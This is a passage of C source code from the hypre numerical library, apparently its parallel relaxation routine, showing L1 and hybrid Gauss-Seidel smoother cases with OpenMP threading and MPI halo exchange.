for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
}
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
prod = (1.0-relax_weight*omega);
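/* Weighted (SOR-style) update used below: with prod = 1 - relax_weight*omega,
   u[i] <- prod*u[i] + relax_weight*(omega*res + res0 + (1-omega)*res2) / l1_norms[i],
   where res0 uses the freshly updated in-sweep values, res2 uses the
   pre-sweep values saved in Vtemp, and res collects f[i] minus the
   contributions from outside the sweep. The diagonal entry is skipped
   in the loops and enters through l1_norms and prod. */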
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 + one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
for (i = ne-1; i > ns-1; i--) /* then sweep the same block backward */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res = f_data[i];
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
for (i = n-1; i > -1; i--) /* then sweep backward over all points */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res = f_data[i];
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points && l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res2 += A_diag_data[jj] * Vtemp_data[ii];
res0 -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res2 += A_diag_data[jj] * Vtemp_data[ii];
res0 -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
/* Hybrid: Jacobi off-processor, ordered Gauss-Seidel on-processor */
case 10:
{
if (num_threads > 1)
{
Ztemp_local = hypre_ParVectorLocalVector(Ztemp);
Ztemp_data = hypre_VectorData(Ztemp_local);
}
#ifdef HYPRE_USING_PERSISTENT_COMM
// JSP: persistent comm can be similarly used for other smoothers
hypre_ParCSRPersistentCommHandle *persistent_comm_handle;
#endif
if (num_procs > 1)
{
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_PACK_UNPACK] -= hypre_MPI_Wtime();
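/* profile counters accumulate elapsed time: subtract the start
   timestamp here, add the end timestamp when the phase finishes */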
#endif
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
#ifdef HYPRE_USING_PERSISTENT_COMM
persistent_comm_handle = hypre_ParCSRCommPkgGetPersistentCommHandle(1, comm_pkg);
v_buf_data = (HYPRE_Real *) hypre_ParCSRCommHandleSendDataBuffer(persistent_comm_handle);
Vext_data = (HYPRE_Real *) hypre_ParCSRCommHandleRecvDataBuffer(persistent_comm_handle);
#else
v_buf_data = hypre_CTAlloc(HYPRE_Real,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
#endif
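/* With persistent communication the send/recv buffers belong to the
   persistent handle and are reused across calls; otherwise they are
   allocated here and freed after the relaxation sweep. */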
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
HYPRE_Int begin = hypre_ParCSRCommPkgSendMapStart(comm_pkg, 0);
HYPRE_Int end = hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends);
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for HYPRE_SMP_SCHEDULE
#endif
for (i = begin; i < end; i++)
{
v_buf_data[i - begin]
= u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,i)];
}
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_PACK_UNPACK] += hypre_MPI_Wtime();
hypre_profile_times[HYPRE_TIMER_ID_HALO_EXCHANGE] -= hypre_MPI_Wtime();
#endif
#ifdef HYPRE_USING_PERSISTENT_COMM
hypre_ParCSRPersistentCommHandleStart(persistent_comm_handle, HYPRE_MEMORY_HOST, v_buf_data);
#else
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data, Vext_data);
#endif
/*-----------------------------------------------------------------
 * Complete the halo exchange started above.
 *-----------------------------------------------------------------*/
#ifdef HYPRE_USING_PERSISTENT_COMM
hypre_ParCSRPersistentCommHandleWait(persistent_comm_handle, HYPRE_MEMORY_HOST, Vext_data);
#else
hypre_ParCSRCommHandleDestroy(comm_handle);
#endif
comm_handle = NULL;
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_HALO_EXCHANGE] += hypre_MPI_Wtime();
#endif
}
// Check for an ordering of the matrix. If one is stored, get the pointer;
// otherwise compute the ordering and cache it on the matrix.
HYPRE_Int *proc_ordering;
if (!hypre_ParCSRMatrixProcOrdering(A)) {
proc_ordering = hypre_CTAlloc(HYPRE_Int, n, HYPRE_MEMORY_HOST);
hypre_topo_sort(A_diag_i, A_diag_j, A_diag_data, proc_ordering, n);
hypre_ParCSRMatrixProcOrdering(A) = proc_ordering;
}
else {
proc_ordering = hypre_ParCSRMatrixProcOrdering(A);
}
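/* The sweeps below visit rows in proc_ordering order, so each row is
   relaxed after the rows it depends on (ordered Gauss-Seidel via the
   topological sort above). The first entry of each diagonal row is
   taken to be the diagonal element, per the hypre CSR convention. */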
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_RELAX] -= hypre_MPI_Wtime();
#endif
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
HYPRE_Int row = proc_ordering[i];
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point row; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[row]] != zero)
{
res = f_data[row];
for (jj = A_diag_i[row]+1; jj < A_diag_i[row+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
res -= A_diag_data[jj] * u_data[ii];
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[row]; jj < A_offd_i[row+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[row] = res / A_diag_data[A_diag_i[row]];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
HYPRE_Int row = proc_ordering[i];
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[row]] != zero)
{
res = f_data[row];
for (jj = A_diag_i[row]+1; jj < A_diag_i[row+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[row]; jj < A_offd_i[row+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[row] = res / A_diag_data[A_diag_i[row]];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
HYPRE_Int row = proc_ordering[i];
/*-----------------------------------------------------------
* If row is of the right type ( C or F ) and diagonal is
* nonzero, relax point row; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[row] == relax_points
&& A_diag_data[A_diag_i[row]] != zero)
{
res = f_data[row];
for (jj = A_diag_i[row]+1; jj < A_diag_i[row+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
res -= A_diag_data[jj] * u_data[ii];
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[row]; jj < A_offd_i[row+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[row] = res / A_diag_data[A_diag_i[row]];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
HYPRE_Int row = proc_ordering[i];
/*-----------------------------------------------------------
* If row is of the right type ( C or F ) and diagonal is
* nonzero, relax point row; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[row] == relax_points
&& A_diag_data[A_diag_i[row]] != zero)
{
res = f_data[row];
for (jj = A_diag_i[row]+1; jj < A_diag_i[row+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[row]; jj < A_offd_i[row+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[row] = res / A_diag_data[A_diag_i[row]];
}
}
}
}
#ifndef HYPRE_USING_PERSISTENT_COMM
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
#endif
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_RELAX] += hypre_MPI_Wtime();
#endif
}
break;
case 13: /* hybrid L1 Gauss-Seidel forward solve */
{
if (num_threads > 1)
{
Ztemp_local = hypre_ParVectorLocalVector(Ztemp);
Ztemp_data = hypre_VectorData(Ztemp_local);
}
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg,i+1); j++)
v_buf_data[index++]
= u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data, Vext_data);
/*-----------------------------------------------------------------
 * Complete the halo exchange before relaxing.
 *-----------------------------------------------------------------*/
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_weight == 1 && omega == 1)
{
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
tmp_data[i] = u_data[i];
}
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
{
res -= A_diag_data[jj] * tmp_data[ii];
}
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
}
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
prod = (1.0-relax_weight*omega);
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res = f_data[i];
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res2 += A_diag_data[jj] * Vtemp_data[ii];
res0 -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
case 14: /* hybrid L1 Gauss-Seidel backward solve */
{
if (num_threads > 1)
{
Ztemp_local = hypre_ParVectorLocalVector(Ztemp);
Ztemp_data = hypre_VectorData(Ztemp_local);
}
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
